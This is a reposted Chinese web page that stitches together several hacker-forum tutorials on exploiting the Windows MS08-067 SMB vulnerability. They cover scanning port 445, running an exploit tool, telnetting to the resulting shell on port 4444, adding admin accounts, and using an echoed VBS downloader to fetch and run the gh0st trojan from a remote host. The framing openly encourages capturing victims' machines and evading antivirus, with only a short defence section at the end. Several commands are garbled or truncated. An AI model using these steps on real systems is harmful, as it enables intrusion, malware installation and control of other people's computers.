2024年3月21日发(作者:网易云网页版)
黑客MS08-067漏洞攻击全程演示(图解)
MS08-067漏洞是Server 服务中的漏洞,该漏洞可能允许远程代码执行。下面我们来进行
MS08-067漏洞远程溢出演示,让我们看看我们的机子是如何轻易的成为人家的肉鸡,被控
制的
1.漏洞主机扫描。
使用专业端口扫描工具扫描445端口。获取可溢出的主机列表。
如下图:
08-067溢出工具进行主机溢出,
格式 ip 溢出成功标志:
SMB Connect OK!
Send Payload Over!
3.溢出成功后会开放4444端口,直接telnet登陆上去。
ig确认溢出成功。
5.添加用户确认获取系统权限
6.防范办法:
针对该溢出,我们并不是没有办法,既然是要扫描445端口,然后telnet,我们只需如下的
方法就可以解决:
一、及时安装KB958644补丁
二、关闭或屏蔽掉445端口。
三、安装专业防火墙。
《MS08-067》溢出:扫445端口, 溢出
Q:提示
SMB Connect OK!
RpcExceptionCode() = 1722
这样溢出成功了么?
A:溢出失败,对方开启了防火墙。
Q:提示
Make SMB Connection error:1203
是怎么回事?
A:对方没有开机联网或者没有安装 Microsoft 网络的文件和打印机共享 协议 或没有启动
Server服务。
Q:提示
SMB Connect OK!
Maybe Patched!
补丁已经打上了。不存在漏洞。
SMB Connect OK
Maybe Patched!
这个说明对方已经打了补丁
SMB Connect OK!
Send Payload Over!
溢出成功
----------------------------------------------------
在cmd下直接运行 出现命令帮助
很简单,只需要输入 IP 就可以了。
MS08-067 Exploit for CN by
[ft=#ff0000,,
目标机为虚拟机(IP 192.168.1.2),攻击者为本机(IP 192.168.1.188)
虚拟机端口开放如下:
输入命令:
192.168.1.2
提示:
SMB Connect OK!
Send Payload Over!
再次查看虚拟机的端口:
我们看到当我们运行了 192.168.1.2 之后,虚拟机的端口出现了个 4444 端口,
状态为 LISTENING ,这时就说明已经溢出成功了,接下来我们在本机运行
Telnet 192.168.1.2 4444
就可以了Telnet登陆到目标机了。
2008年10月29日
[新洞试练]Ms08-067 Exp 详细测试流程(图文)
[新洞试练]Ms08-067 Exp 详细测试流程(图文)
Writed By 樱木花盗
Blog:
***************
为了测试这个,我装了三个虚拟机。。。一两个XP一个2003,终于弄明白都需要哪些必要条
件了,写出来和大家分享,希望对离成功还差一步的同学们有所帮助,感谢幻影的牛人放出
MS08-067的Exp,自由,共享。
下载:
经过N+1次的测试之后发现,本机和目标机必须要开启以下服务,否则就算对方没有打补
丁也会失败。
Server、Computer Browser、Workstation。
下面测试开始(和我局域网的同学们的电脑我都会第一时间叫他们打补丁。。。这次没法儿用
他们的电脑测试了,我只好装虚拟机测试)
在cmd下直接运行 出现命令帮助
很简单,只需要输入 IP 就可以了。
MS08-067 Exploit for CN by ***************
目标机为虚拟机(IP 192.168.1.2),攻击者为本机(IP 192.168.1.188)
虚拟机端口开放如下:
输入命令:
192.168.1.2
提示:
SMB Connect OK!
Send Payload Over!
再次查看虚拟机的端口:
我们看到当我们运行了 192.168.1.2 之后,虚拟机的端口出现了个 4444 端口,
状态为 LISTENING ,这时就说明已经溢出成功了,接下来我们在本机运行
Telnet 192.168.1.2 4444
就可以了Telnet登陆到目标机了。
执行个命令加个帐户看看,成功了~
测试到此结束,以下关于此次测试大家可能遇到的几个问题我在这里集中回答下。
Q:我的 服务 里没有 Server 这个服务怎么办?
A:在 本地连接-属性 里 点 安装-服务-添加-Microsoft 网络的文件和打印机共享 ,点确定,
会提示是否重启,其实不用重启就可以,在服务里按F5刷新一下就有这个服务了。
Q:提示
SMB Connect OK!
RpcExceptionCode() = 1722
这样溢出成功了么?
A:溢出失败,对方开启了防火墙。
Q:提示
Make SMB Connection error:1203
是怎么回事?
A:对方没有开机联网或者没有安装 Microsoft 网络的文件和打印机共享 协议 或没有启动
Server服务。
Q:提示
SMB Connect OK!
Maybe Patched!
是怎么回事?
A:目标已经打上了这个补丁。
转载请注明出自暗组技术论坛 /bbs/,本贴地
址:/bbs/?tid=26874
工具名称
攻击入侵
利用远程溢出漏洞进行攻击是一种非常有效而且威力巨大的黑客攻击手段,不过远程溢出
漏洞有很强的时效性,必须要抓紧时间利用这个漏洞还未被普遍补上的时机进行攻击,一
旦过了这段时间,漏洞补上之后就很难再重现远程溢出攻击了。
微软Windows系统已经有一年多没有爆出远程溢出漏洞了,微软爆出四年以来最严重
的特大安全漏洞——MS08-067远程溢出漏洞,几乎影响 所有Windows系统,并且很快成
为黑客攻击和木马传播利用的手段,受此漏洞危害的用户系统将会非常之多!让我们快借
此机会玩玩远程溢出吧!学过远程溢 出的赶紧进行实践,抓肉鸡一抓就得!
一、MS08-067远程溢出漏洞简介
曾经的冲击波、震荡波等大规模攻击都是由于Windows的RPC服务漏洞造成的,
MS08-067远程溢出漏洞也不例外。MS08-067远程 溢出漏洞的原因是由于Windows系统
中RPC存在缺陷造成的,Windows系统的Server服务在处理特制RPC请求时存在缓冲区
溢出漏洞,远程 攻击者可以通过发送恶意的RPC请求触发这个溢出,如果受影响的系统
收到了特制伪造的RPC请求,可能允许远程执行代码,导致完全入侵用户系统,以 SYSTEM
权限执行任意指令并获取数据,并获取对该系统的控制权,造成系统失窃及系统崩溃等严
重问题。
发布日期 点击数
MS08-067
Jim
漏洞利用
2008-12-16 799
工具
受MS08-067远程溢出漏洞影响的系统非常多,受影响的操作系统有
Windows XP /2000/Vista/2003等。除 Windows Server 2008 Core外,基本上所有的Windows
系统都会遭受此漏洞的攻击,特别是在Windows 2000、 Windows XP和
Windows Server 2003系统,攻击者可以利用此漏洞无需通过认证运行任意代码。这个漏
洞还可能被蠕虫利用,此安全 漏洞可以通过恶意构造的网络包直接发起攻击,并且攻击
者可以获取完整权限,因此该漏洞很可能会被用于制作蠕虫以进行大规模的攻击。
二、漏洞主机扫描
在利用MS08-067远程溢出漏洞进行攻击前,首先要找到要攻击的主机目标。由于启用
了RPC服务的Windows系统往往会开放445端口, 因此攻击者只要使用专业端口扫描工
具扫描445端口,即可获取可溢出的主机列表。这里使用的是老牌扫描工具——图标是一
个瑞士军刀的X-Scan。
1.扫描设置
步骤1:运行X-Scan后,首先需要设置扫描的目标IP地址段。点击工具栏上的“扫描参
数”按钮,选择“检测范围”选项,在“指定IP范围”里可以输入一个固定的IP地址或IP地址
段。
步骤2:切换到“全局设置”→“扫描模块”选项,设置扫描模块为“开放服务”。
步骤3:在“插件设置”→“端口相关设置”中,将待检测的端口改为“445”。
步骤4:在“全局设置”→“其它设置”中,将扫描类型设置为“无条件扫描”。
步骤5:最后在“全局设置”→“扫描报告”中勾选“扫描完成后自动生成并显示报告”项,设
置完毕后点击确定按钮,关闭对话框。
步骤6:点击工具栏上的“开始扫描”按钮,X-scan就开始工作了。确定后,即可开始进
行扫描。扫描结束后,会自动弹出一个扫描结果窗口查看到扫描结果。如果发现开放了
445端口的主机,那么这些主机只要未及时打上补丁,都很可能遭受攻击成为入侵者的肉
鸡!
三、MS08-067溢出工具溢出攻击
现在我们可以一个一个的尝试溢出攻击扫描出来的目标了。首先,下载溢出攻击工具
“MS08-067远程溢出漏洞利用工具”,并将其解压于C盘根目 录下。点击“开始”菜单→“运
行”,输入命令“CMD”,回车后打开命令提示符窗口。进入溢出工具所有的文件夹“Release”
目录下,执行命令 “”,可看到溢出工具命令使用格式
为:
1.建立空连接
在攻击前,首先要与目标主机建立一个空连接,这里假设我们要攻击的目标主机为
“192.168.1.8”,可执行如下命令:
net use 192.168.1.9ipc$
命令执行后,即可与远程主机建立一个空连接。
提示:
这一步不是必须的,如果有的主机无法溢出成功,可以先进行空连接。而有的主机则不
必建立空连接,即可进行溢出。
2.执行远程溢出
建立空连接后,即可进行溢出攻击了。攻击命令如下:
192.168.1.9
执行攻击命令后,溢出程序就会自动与远程主机建立SMB连接,并进行溢出攻击。
3.溢出返回结果
溢出攻击后,往往会有不同的返回结果提示信息,一般有三种情况:
如果返回的信息为:
SMB Connect OK!
Maybe Patched!
那么说明远程主机上可能已经打上了该溢出漏洞补丁,虽然可以建立SMB连接,但是
无法攻击成功。
如果返回信息为:Make SMB Connection error:53或者 Make SMB Connection error:1219,
后面的数字可能是变化的。那么说明该主机没有开机连网或者没有安 装 Microsoft 网络的
文件和打印机共享协议 或没有启动Server服务,因此无法进行溢出。
还有一种情况是返回信息为:
SMB Connect OK!
RpcExceptionCode() = 1722
出现这样的情况,溢出失败,对方开启了防火墙。
那么最后就是成功的提示信息了:
SMB Connect OK!
Send Payload Over!
出现这样的提示,说明溢出成功,成功的发送溢出模块并绑定在了远程主机端口上。
4.远程登录
现在溢出成功后就可以远程登录了,登录命令很简单:
Tlenet IP地址 4444
直接用Telnet连接远程主机IP地址的4444端口就可以了。这里执行了命令:
Telnet 119.1.41.97 4444
成功的连接上了远程主机。在远程主机上执行命令“netstat -an”时,可以看到开放了4444
端口,这就是溢出打开的端口。
四、VBS脚本入侵
现在我们可以在远程主机上任意添加管理员帐户,或者开启3389远程桌面进行连接。
不过最简单的还是用木马来进行攻击。
1.配置木马
首先,配置一个木马服务端程序,这里我选择了“gh0st 3.6”,这个木马可以过瑞星和卡
巴斯基的主动防御,非常强!将木马上传到某个空间 中,然后在远程主机上执行命令:
“tasklist”,命令执行后可查看远程主机上的所有进程。这里我们发现远程主机未开启任何
防火墙和杀毒软件,而且发 现对方正在玩QQ游戏斗地主。没有运行杀毒软件的话,可
以直接上传木马,连免杀都不用。如果发现杀毒软件进程的话,可以有针对性的进行免杀。
2.生成下载脚本
然后在远程命令窗口中执行如下命令:
echo iLocal = LCase(nts(1)) >
echo iRemote = LCase(nts(0)) >>
echo Set xPost = CreateObject("P") >>
echo "GET",iRemote,0 >>
echo () >>
echo Set sGet = CreateObject("") >>
echo = 3 >>
echo = 1 >>
echo () >>
echo (seBody) >>
echo File iLocal,2 >>
命令执行后,可在远程主机当前目录下生成一个名为“”的脚本文件。
在远程窗口中执行生成脚本和下载木马并运行时,速度一定要快,否则如果对方关机或
者出现什么意外断开连接时,就无法再次连接了。因为这个漏洞只能溢出一次,而且溢出
后只能连接一次。
3.下载运行木马
生成下载脚本后,就可以用脚本下载运行木马程序了,这里我们上传的木马连接地址为
“:81/”,因此执行如下命令:
cscript :81/
前面的“cscript”是用于执行脚本的,后面的“”是下载木马后保存的文件名。命
令执行后,木马就被下载到远程主机上了。在命令行窗口中执行“”,即可成功
运行木马程序。
用木马客户端连接木马,一台肉鸡就到手啦!笔者在测试过程中,发现MS08-067远程
溢出成功率可达30%以上。一般来说,只要远程主机上未安 装防火墙,并且同时开启了
Computer Browser、Server、Workstation这三个系统服务,并且存在此溢出漏洞,通常都
可以溢出 成功。
五、防范MS08-067远程溢出
由于MS08-067远程溢出危害非常大,因此有必要对其进行防范。但是由于前段时间的
微软“黑屏”事件让不少用户成了关闭了自动更新,宁可系统 漏洞百出也不去打补丁,于
是此漏洞在许多主机上都存在,给黑客利用MS08-067漏洞进行攻击提供了可乘之机。其
实造成盗版用户黑屏的补丁是 KB892130,这个漏洞的安全补丁编号是KB958644,我们只
要安装此补丁就可以了,也可以通过第三方工具,下载补丁包打上该补丁。
另外,将Computer Browser、Server、Workstation这三个系统服务关闭,毕竟这三个服
务在大多数情况下是用不到的。同时,为了防止以后RPC又出现什么漏洞,最好是安装防
火墙,关闭本机的445端口。
发布者:admin,转转请注明出处:http://www.yc00.com/xitong/1711008573a1848514.html
评论列表(0条)